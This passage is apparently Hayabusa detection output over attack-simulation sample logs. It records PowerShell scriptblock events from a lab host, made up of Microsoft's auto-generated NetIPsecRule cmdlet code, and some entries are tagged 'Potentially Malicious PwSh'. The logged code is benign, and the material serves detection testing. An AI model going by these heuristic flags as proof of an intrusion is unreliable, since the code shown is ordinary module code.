[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
